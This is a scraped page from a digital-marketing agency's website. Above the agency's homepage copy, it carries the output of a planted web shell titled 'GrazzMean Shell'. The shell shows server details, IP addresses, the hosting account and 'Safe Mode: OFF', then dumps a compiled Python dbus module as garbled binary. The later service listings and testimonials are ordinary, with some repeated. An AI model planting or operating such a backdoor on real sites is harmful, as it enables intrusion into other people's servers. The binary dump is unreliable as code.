404 Not Found


nginx
beegazpacho.com - GrazzMean
shell bypass 403

GrazzMean Shell

Uname: Linux in-mum-web1557.main-hosting.eu 5.14.0-503.35.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Apr 4 05:23:43 EDT 2025 x86_64
Software: LiteSpeed
PHP version: 8.2.30 [ PHP INFO ] PHP os: Linux
Server Ip: 88.222.222.174
Your Ip: 216.73.216.168
User: u848900432 (848900432) | Group: o51372345 (1051372345)
Safe Mode: OFF
Disable Function:
NONE

name : proxies.cpython-39.pyc
a

�	z]�`�@s�ddlZzddlmZWney6ddlmZYn0ddlZddlmZddlm	Z	m
Z
mZmZdZ
e�d�ZddlmZmZmZmZmZddlmZGd	d
�d
�ZGdd�d�ZGd
d�de�ZGdd�de�ZdS)�N)�RLock)�process_introspection_data)�
DBusException�IntrospectionParserException�MissingErrorHandlerException�MissingReplyHandlerExceptionZrestructuredtextzdbus.proxies)�BUS_DAEMON_IFACE�BUS_DAEMON_NAME�BUS_DAEMON_PATH�INTROSPECTABLE_IFACE�
LOCAL_PATH)�is_py2c@s(eZdZdZdd�Zdd�Zdd�ZdS)	�_DeferredMethodzXA proxy method which will only get called once we have its
    introspection reply.
    cCs||_|j|_||_||_dS�N)�
_proxy_method�_method_name�_append�_block)�self�proxy_method�append�block�r�2/usr/lib64/python3.9/site-packages/dbus/proxies.py�__init__8sz_DeferredMethod.__init__cOsDd|vs|�dd�r(|�|j||�dS|��|j|i|��SdS)N�
reply_handler�ignore_replyF)�getrrr�r�args�keywordsrrr�__call__?s
�z_DeferredMethod.__call__cOs|�|j||�dSr)rrrrrr�
call_asyncJsz_DeferredMethod.call_asyncN��__name__�
__module__�__qualname__�__doc__rr!r"rrrrr4src@s(eZdZdZdd�Zdd�Zdd�ZdS)	�_ProxyMethodz�A proxy method.

    Typically a member of a ProxyObject. Calls to the
    method produce messages that travel over the Bus and are routed
    to a specific named Service.
    cCsX|tkrtdt��||_||_||_||_t�|�||_|durNt�	|�||_
dS)Nz1Methods may not be called on the reserved path %s)rr�_proxy�_connection�_named_service�_object_path�_dbus_bindingsZvalidate_member_namerZvalidate_interface_name�_dbus_interface)r�proxyZ
connection�bus_name�object_pathZmethod_nameZifacerrrrUs�

z_ProxyMethod.__init__c		Os|�dd�}|�dd�}|�dd�}|�dd�}|dus@|durl|durPt��n|dur`t��n|rltd��|�d|j�}|dur�|dur�|j}n|d|j}|jj�|d�}|s�|dur�|j	j
|j|j||j||||fi|��n$|j	j
|j|j||j||fi|��SdS)	Nr�
error_handlerrF�	signaturez6ignore_reply and reply_handler cannot be used together�dbus_interface�.)�poprr�	TypeErrorr.rr)�_introspect_method_maprr*r"r+r,Z
call_blocking)	rrr rr2rr3r4�keyrrrr!isL
��

��z_ProxyMethod.__call__c	Os�|�dd�}|�dd�}|�dd�}|�d|j�}|durd|rN|d|j}n|j}|jj�|d�}|jj|j|j	||j||||fi|��dS)Nrr2r3r4r5)
r6r.rr)r8rr*r"r+r,)rrr rr2r3r4r9rrrr"�s(
��z_ProxyMethod.call_asyncNr#rrrrr(Ns,r(c@s�eZdZdZeZeZdZdZ	dZ
d%dd	�Zed
d�ddd�Z
ed
d�ddd�Zedd�ddd�Zd&dd�Zdd�Zdd�Zdd�Zdd�Zdd�Zdd�Zdd �Zd'd!d"�Zd#d$�ZeZdS)(�ProxyObjectz�A proxy to the remote Object.

    A ProxyObject is provided by the Bus. ProxyObjects
    have member functions, and can be called like normal Python objects.
    r��NTFc
Ks:|�dd�}|durB|dur$td��|}ddlm}|dtdd�|�d	d�}	|	dur�|durftd
��|	}ddlm}|dtdd�|r�tdd
�|�����|r�|��||_|dur�t	�
|�||_|_t	�
|�||_|s�|�|�|_d|_g|_i|_t�|_|�r|jtk�r$|j|_n|j|_|��|_dS)a�Initialize the proxy object.

        :Parameters:
            `conn` : `dbus.connection.Connection`
                The bus or connection on which to find this object.
                The keyword argument `bus` is a deprecated alias for this.
            `bus_name` : str
                A bus name for the application owning the object, to be used
                as the destination for method calls and the sender for
                signal matches. The keyword argument ``named_service`` is a
                deprecated alias for this.
            `object_path` : str
                The object path at which the application exports the object
            `introspect` : bool
                If true (default), attempt to introspect the remote
                object to find out supported methods and their signatures
            `follow_name_owner_changes` : bool
                If true (default is false) and the `bus_name` is a
                well-known name, follow ownership changes for that name
        �busNz%conn and bus cannot both be specifiedr)�warnz`Passing the bus parameter to ProxyObject by name is deprecated: please use positional parametersr<)�
stacklevel�
named_servicez3bus_name and named_service cannot both be specifiedzjPassing the named_service parameter to ProxyObject by name is deprecated: please use positional parametersz>ProxyObject.__init__ does not take these keyword arguments: %sz, )r6r7�warningsr>�DeprecationWarning�join�keysZ_require_main_loop�_busr-Zvalidate_bus_namer+�_requested_bus_nameZvalidate_object_path�__dbus_object_path__Zactivate_name_owner�_pending_introspect�_pending_introspect_queuer8r�_introspect_lockr� INTROSPECT_STATE_DONT_INTROSPECT�_introspect_state�'INTROSPECT_STATE_INTROSPECT_IN_PROGRESS�_Introspect)
rZconnr0r1Z
introspectZfollow_name_owner_changes�kwargsr=r>r@rrrr�sP���


zProxyObject.__init__cCs|jSr)r+�rrrr�<lambda>�zProxyObject.<lambda>a�The bus name to which this proxy is bound. (Read-only,
            may change.)

            If the proxy was instantiated using a unique name, this property
            is that unique name.

            If the proxy was instantiated with a well-known name and with
            ``follow_name_owner_changes`` set false (the default), this
            property is the unique name of the connection that owned that
            well-known name when the proxy was instantiated, which might
            not actually own the requested well-known name any more.

            If the proxy was instantiated with a well-known name and with
            ``follow_name_owner_changes`` set true, this property is that
            well-known name.
            cCs|jSr)rFrPrrrrQ rRz[The bus name which was requested when this proxy was
            instantiated.
            cCs|jSr)rGrPrrrrQ&rRzThe object-path of this proxy.cKs"|jj|f|||j|jd�|��S)axArrange for the given function to be called when the given signal
        is received.

        :Parameters:
            `signal_name` : str
                The name of the signal
            `handler_function` : callable
                A function to be called when the signal is emitted by
                the remote object. Its positional arguments will be the
                arguments of the signal; optionally, it may be given
                keyword arguments as described below.
            `dbus_interface` : str
                Optional interface with which to qualify the signal name.
                If None (the default) the handler will be called whenever a
                signal of the given member name is received, whatever
                its interface.
        :Keywords:
            `utf8_strings` : bool
                If True, the handler function will receive any string
                arguments as dbus.UTF8String objects (a subclass of str
                guaranteed to be UTF-8). If False (default) it will receive
                any string arguments as dbus.String objects (a subclass of
                unicode).
            `byte_arrays` : bool
                If True, the handler function will receive any byte-array
                arguments as dbus.ByteArray objects (a subclass of str).
                If False (default) it will receive any byte-array
                arguments as a dbus.Array of dbus.Byte (subclasses of:
                a list of ints).
            `sender_keyword` : str
                If not None (the default), the handler function will receive
                the unique name of the sending endpoint as a keyword
                argument with this name
            `destination_keyword` : str
                If not None (the default), the handler function will receive
                the bus name of the destination (or None if the signal is a
                broadcast, as is usual) as a keyword argument with this name.
            `interface_keyword` : str
                If not None (the default), the handler function will receive
                the signal interface as a keyword argument with this name.
            `member_keyword` : str
                If not None (the default), the handler function will receive
                the signal name as a keyword argument with this name.
            `path_keyword` : str
                If not None (the default), the handler function will receive
                the object-path of the sending object as a keyword argument
                with this name
            `message_keyword` : str
                If not None (the default), the handler function will receive
                the `dbus.lowlevel.SignalMessage` as a keyword argument with
                this name.
            `arg...` : unicode or UTF-8 str
                If there are additional keyword parameters of the form
                ``arg``\ *n*, match only signals where the *n*\ th argument
                is the value given for that keyword parameter. As of this time
                only string arguments can be matched (in particular,
                object paths and signatures can't).
        )�signal_namer4r0�path)rEZadd_signal_receiverr+rG�rrSZhandler_functionr4r rrr�connect_to_signal2s<
���zProxyObject.connect_to_signalc	Cs>i}trd|d<|jj|j|jtddd|j|jfddi|��S)NTZutf8_stringsZ
Introspect�rZrequire_main_loopF)r
rEr"r+rGr�_introspect_reply_handler�_introspect_error_handler)rrOrrrrNus
���zProxyObject._IntrospectcCs*|jD]\}}}||i|��qg|_dSr)rI)rrrr rrr�_introspect_execute_queue�sz%ProxyObject._introspect_execute_queuec
Cs�|j��zpzt|�|_Wn<tyV}z$|�|�WYd}~W|j��dSd}~00|j|_d|_	|�
�W|j��n|j��0dSr)rJ�acquirerr8rrY�release� INTROSPECT_STATE_INTROSPECT_DONErLrHrZ)r�data�errrrX�s


�
z%ProxyObject._introspect_reply_handlercCsrt��t�d|j|j|jj|jj|�|j	�
�z.t�d�|j|_
d|_|��W|j	��n|j	��0dS)Nz$Introspect error on %s:%s: %s.%s: %sz'Executing introspect queue due to error)�loggingZbasicConfig�_logger�errorr+rG�	__class__r%r$rJr[�debugrKrLrHrZr\)rrbrrrrY�s�


z%ProxyObject._introspect_error_handlercCs>|j��z"|jdur |j��W|j��n|j��0dSr)rJr[rHrr\rPrrr�_introspect_block�s


zProxyObject._introspect_blockcCsX|j��z<|j|jkr,|j�|||f�n||i|��W|j��n|j��0dSr)rJr[rLrMrIrr\)r�callbackrrOrrr�_introspect_add_to_queue�s
z$ProxyObject._introspect_add_to_queuecCs,|�d�r|�d�rt|��n
|�|�SdS�N�__)�
startswith�endswith�AttributeError�get_dbus_method�r�memberrrr�__getattr__�s
zProxyObject.__getattr__cCs<|�||j|j|j||�}|j|jkr8|�||j|j�}|S)a,Return a proxy method representing the given D-Bus method. The
        returned proxy method can be called in the usual way. For instance, ::

            proxy.get_dbus_method("Foo", dbus_interface='com.example.Bar')(123)

        is equivalent to::

            proxy.Foo(123, dbus_interface='com.example.Bar')

        or even::

            getattr(proxy, "Foo")(123, dbus_interface='com.example.Bar')

        However, using `get_dbus_method` is the only way to call D-Bus
        methods with certain awkward names - if the author of a service
        implements a method called ``connect_to_signal`` or even
        ``__getattr__``, you'll need to use `get_dbus_method` to call them.

        For services which follow the D-Bus convention of CamelCaseMethodNames
        this won't be a problem.
        )	�ProxyMethodClassrEr+rGrLrM�DeferredMethodClassrgre)rror4�retrrrrm�s
�	
�zProxyObject.get_dbus_methodcCsd|j|j|jt|�fS)Nz&<ProxyObject wrapping %s %s %s at %#x>)rEr+rG�idrPrrr�__repr__�s�zProxyObject.__repr__)NNNTF)N)N)r$r%r&r'r(rqrrrrKrMr]r�propertyr0�requested_bus_namer1rVrNrZrXrYrergrprmru�__str__rrrrr:�s>�
S���
C

&r:c@s�eZdZdZdd�Zedd�ddd�ZeZedd�ddd	�Zed
d�ddd�Z	edd�ddd
�Z
edd�ddd�Zddd�Zdd�Z
ddd�Zdd�ZeZdS)�	Interfacez�An interface into a remote object.

    An Interface can be used to wrap ProxyObjects
    so that calls can be routed to their correct
    D-Bus interface.
    cCs$t|t�r|j|_n||_||_dS)a:Construct a proxy for the given interface on the given object.

        :Parameters:
            `object` : `dbus.proxies.ProxyObject` or `dbus.Interface`
                The remote object or another of its interfaces
            `dbus_interface` : str
                An interface the `object` implements
        N)�
isinstancery�proxy_object�_objr.)r�objectr4rrrr�s	

zInterface.__init__cCs|jjSr)r|r1rPrrrrQrRzInterface.<lambda>Nz.The D-Bus object path of the underlying objectcCs|jjSr)r|r0rPrrrrQrRz:The bus name to which the underlying proxy object is boundcCs|jjSr)r|rwrPrrrrQrRzGThe bus name which was requested when the underlying object was createdcCs|jSr)r|rPrrrrQrRzThe underlying proxy objectcCs|jSr)r.rPrrrrQrRzThe D-Bus interface representedcKs"|s
|j}|jj|||fi|��S)aaArrange for a function to be called when the given signal is
        emitted.

        The parameters and keyword arguments are the same as for
        `dbus.proxies.ProxyObject.connect_to_signal`, except that if
        `dbus_interface` is None (the default), the D-Bus interface that
        was passed to the `Interface` constructor is used.
        )r.r|rVrUrrrrVs

��zInterface.connect_to_signalcCs2|�d�r|�d�rt|��n|j�||j�SdSrh)rjrkrlr|rmr.rnrrrrp$s
zInterface.__getattr__cCs|dur|j}|j�||�S)a&Return a proxy method representing the given D-Bus method.

        This is the same as `dbus.proxies.ProxyObject.get_dbus_method`
        except that if `dbus_interface` is None (the default),
        the D-Bus interface that was passed to the `Interface` constructor
        is used.
        N)r.r|rm)rror4rrrrm*szInterface.get_dbus_methodcCsd|j|jt|�fS)Nz%<Interface %r implementing %r at %#x>)r|r.rtrPrrrru6s�zInterface.__repr__)N)N)r$r%r&r'rrvr1rGr0rwr{r4rVrprmrurxrrrrry�s2������

ry)r`�	threadingr�ImportErrorZdummy_threadingr-Zdbus._expat_introspect_parserrZdbus.exceptionsrrrrZ
__docformat__Z	getLoggerrarr	r
rrZdbus._compatr
rr(r}r:ryrrrr�<module>s"
`B
© 2026 GrazzMean
Beegazpacho


Let’s  Start  Your  Online  Journey  with  Beegazpacho 

Welcome to Beegazpacho,
where creativity meets strategy,
and innovation drives success.


Contact
Now


OUR CLIENTS

WhatsApp-Image-2021-12-06.png
Untitled-design-11.png
niaf-logo.png
20220406-163308-scaled.jpg
karchi-logo.png
20220405-171252.png
20220405-171309.png
20220321-161603.png
20220321-161611.png
20220321-161628.png
20220321-161244.png
20220321-161256.png
20220321-161450.png
20220321-161205.png
20220226-170222.png
20220321-161051.png
20211202-170852.png
Untitled-design-9
pidilite-png-logo-colour
logo-black-e1706125740216-qisosldqhzgcaerhdt6n4t3m4s50jr0iik48z0h5vk
Fraikin-Dayim-logo-1
hpcl-logo-2-1
services

Transforming Ideas into
Success

.01
Digital Marketing

We drive growth through data-driven strategies and cutting-edge techniques.

Learn More

.02
SEO

Improve your online visibility and rank higher on search engines with our expert SEO services.

Learn More

.03
Website Designing

We design websites that are not only visually stunning but also user-centric, ensuring seamless navigation and enhanced user experience.

Learn More

.04
App Development

Our apps are crafted to be intuitive, engaging, and functional, providing your users with an exceptional mobile experience.

Learn More

.05
Social Media Ads

Target the right audience with precision and creativity to maximize engagement and conversions.

Learn More

.06
Google Ads

Maximize ROI with precision-targeted campaigns on Google’s powerful ad platform.

Learn More

.07
Google My Business

Optimize your local presence with strategies that put your business on the map and attract more customers.

Learn More

.08
Graphic Designing

Our designs tell your brand’s story in a visually compelling way.

Learn More

.09
3D Videos

Bring your product to life with immersive and dynamic 3D explainer videos.

Learn More

about BEEGAZPACHO

creating special Things
For special brands

Join the ranks of successful brands by partnering with Beegazpacho

00+

Happy Customer

00+

Continents

Our vision is not just to be a service provider but to be your partner in growth. We see ourselves as an extension of your team, working tirelessly to ensure that your brand not only meets its goals but surpasses them.

Explore
more

Our Recent Work

Crafted with Passion and Precision

Connect now


Web Design
Design, Development & Identity

Logo Design
Design, Development & Identity

Creative Brand design
Design, Development & Identity

Product Design Marketing
Design, Development & Identity

DIGITAL MARKETING
SEO
WEBSITE DESIGNING
APP DEVELOPMENT
SOCIAL MEDIA ADS
GOOGLE ADS
GOOGLE MY BUSINESS
GRAPHIC DESINING
3D VIDEOS
Client Stories

Hear It from Those Who Know Us Best

Our clients’ success stories speak volumes about our commitment to excellence. Don’t just take our word for it—hear directly from the brands we’ve partnered with. Their testimonials highlight our ability to bring visions to life and create a lasting impact on their businesses.

“Beegazpacho feels like an extension of our team. Their content marketing and social media expertise have elevated our brand. They listen, adapt, and always deliver on time. We look forward to continuing this partnership.”

— Sarah Williams

Head of Marketing, GreenPlanet Apparel

“Beegazpacho’s data-driven strategies helped us improve our online ads, optimize our website, and enhance branding. We’ve seen great ROI and increased visibility. Their professionalism is unmatched.”

— Arvind Shah

CEO, InnovateTech Solutions

“Partnering with Beegazpacho has been a game-changer for our brand. Their creative ad campaigns and SEO services have boosted our online presence and significantly increased leads and sales. We couldn’t ask for a better partner!”

— Rina Kapoor

Marketing Director, Luxury Home Interiors

“Beegazpacho feels like an extension of our team. Their content marketing and social media expertise have elevated our brand. They listen, adapt, and always deliver on time. We look forward to continuing this partnership.”

— Sarah Williams

Head of Marketing, GreenPlanet Apparel

“Beegazpacho’s data-driven strategies helped us improve our online ads, optimize our website, and enhance branding. We’ve seen great ROI and increased visibility. Their professionalism is unmatched.”

— Arvind Shah

CEO, InnovateTech Solutions

“Partnering with Beegazpacho has been a game-changer for our brand. Their creative ad campaigns and SEO services have boosted our online presence and significantly increased leads and sales. We couldn’t ask for a better partner!”

— Rina Kapoor

Marketing Director, Luxury Home Interiors